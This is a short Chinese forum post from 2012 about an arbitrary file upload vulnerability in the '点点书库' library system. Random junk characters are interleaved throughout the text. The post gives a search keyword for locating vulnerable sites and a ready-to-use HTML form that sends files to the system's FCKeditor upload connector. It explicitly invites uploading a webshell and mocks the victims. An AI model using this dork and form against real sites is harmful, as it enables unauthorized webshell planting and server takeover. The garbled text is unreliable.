主题:图书馆系统任意文件上传漏洞* G$ ^2 i% p7 `- m, X2 u
作者:冰锋刺客; m& M/ j; x6 @. V8 [
厂商:点击书(dianjishu.com)
" T& E& S$ c! K9 s% w& E; V 日期:2012-6-21! O; Q; t5 z; L: M5 F2 Q& a
" R9 D7 n ^+ NI 概述( X1 O$ y! K; Z6 {! h
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
+ D( L, v D& O2 A: U4 C8 k, C9 _& m II 简介
( J. o2 h5 @: s- S; `1 x 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"2 ~, s5 U& x4 U1 k+ J! M! @- R
补充一个漏洞
. \; C; {& z8 G4 \1 b ^ <form id="frmUpload" enctype="multipart/form-data"3 Y2 X( J* y/ n$ P8 T+ F
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>2 K E" Z" a( N2 {
<input id="btnUpload" type="submit" value="操翻他">
+ l. _/ A' \) y </form>( D: V1 T6 a: Z$ X, f5 f! ^; U% E
你们懂的
2 w( ~# x9 Y, W 那傻逼提供还需要改包., g: L1 Z5 Q3 A5 g) |- x
自己看了下源代码发现fckeditor* t- ~- x7 M" O7 b+ s
直接秒杀
& Y$ S9 u! J6 n3 N# a& T; X |
发表于 2012-9-10 21:20:59
收藏
支持
反对